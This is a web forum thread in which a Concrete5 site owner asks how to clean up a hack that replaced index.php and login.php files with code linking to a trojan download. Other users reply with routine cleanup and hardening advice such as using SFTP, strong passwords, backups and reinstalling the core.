Concrete5 Web site hacked. Need help tracking down offending files

Permalink
Hi,

A client has had the recently set up Concrete5 web site hacked.

there are at least 3 files involved.

They replaced the index.php and the login.php. there was code pointing it to a russian website that tried to install a downloader trojan.

I still get a virus warning when I try to log in and if I use the wrong password, it triggers the virus warning.

Can someone tell me the name / location of the file that would respond to a bad password?

Also any advice on how to make the site more secure would be greatly appreciated.

Thank you.

Jerlo

jerlo727
 
triplei replied on at Permalink Best Answer Reply
triplei
First off sorry to hear about your situation. 99% of the time these types of hacks are due to a weak ftp password which was broken with a brute-force attack. First off, change your ftp password right away, otherwise their script may just re-upload their modified files.

I'm not sure how much control you have over your hosting environment, but there are a few things you can do. If it's an option disable ftp. If you can get by with just using sftp or ssh you're already one step further ahead. Another option is to lock certain ports (21, 22 would be common ones) to only specific IP addresses. If you are comfortable with only using ssh / sftp, setting up public/private key authentication is a good way to go as well. If you do need to keep using ftp changing the port it runs on from 21 to something non-default can help as well.

As for cleaning up, I would look at your main index.php file first. I have seen it where they just add in a little bit of extra code at the end to inject their content. Cleaning that out can often clear the entire site. If you can get a list of all files modified in the last couple of days and do a diff to your latest backup that should get you going in the right direction.

Hope that gets you going in the right direction at least...
ThemeGuru replied on at Permalink Reply
ThemeGuru
We're in the works of developing some dev tools to check out files to make sure you don't have something unauthorized.

What I would do is first ask your host if they can actually track down the script. I know that for a fact one of our clients websites was hacked Bluehost found the file. It was buried deep within the core of c5.

Even if you lock your ftp you still have the chance of the virus coming back. An alternative idea would be removing the core completely and uploading it again from c5.org that way you only need to dig through a small amount of files.

Hope that helps....
triplei replied on at Permalink Reply
triplei
Good thinking on re-uploading the /concrete folder ThemeGuru. You're right, then you should only have to dig through your template and any custom blocks, packages, etc you have developed yourself. And hopefully you have a clean copy of those on a dev/staging site that you can pull from.
ThemeGuru replied on at Permalink Reply
ThemeGuru
Yep. What we went through was that the hacker kept attacking the site due to their uploaded script.

Good thing you don't have a dos attack. :-)
jerlo727 replied on at Permalink Reply
jerlo727
Thank you for your responses so far.

You're right the password was way too simple and has been changed.

After further investigation what I found were 2 index.php files that had been completely replaced with code linking you to a Russian website where it wanted to install a Downloader Trojan virus. There were also two login.php files that had code added to them that did the same thing.

I downloaded the entire site. With Dreamweaver you can search the code of the site for specific terms. When Avast blocked the connection, it gave me the web address that connected to a page called js.php.

So I did a search for js.php and found the files mentioned above. I replaced them with new ones and all works as it should.

Of course the danger is that Dreamweaver may have missed something but for now, things are working properly.

Since February, this is the third web site of mine to be hacked on two different servers. What a pain.

Thanks again.

jerlo
jasonmskidmore replied on at Permalink Reply
Since you mentioned that this is the third site of yours to be hacked, I thought I'd throw a suggestion your way.

I had a site hacked similarly a while back where they modified my index.php files. Since I made the changes below I've not had any more problems:

- Use SFTP, not FTP
- Use secure SFTP passwords (mixed case, special characters, no dictionary words)
- Use different logins for each site
- Change those passwords every 1-3 months
- Ensure your computer is free of viruses & malware
- Make sure your server is not running any outdated (unsecure) code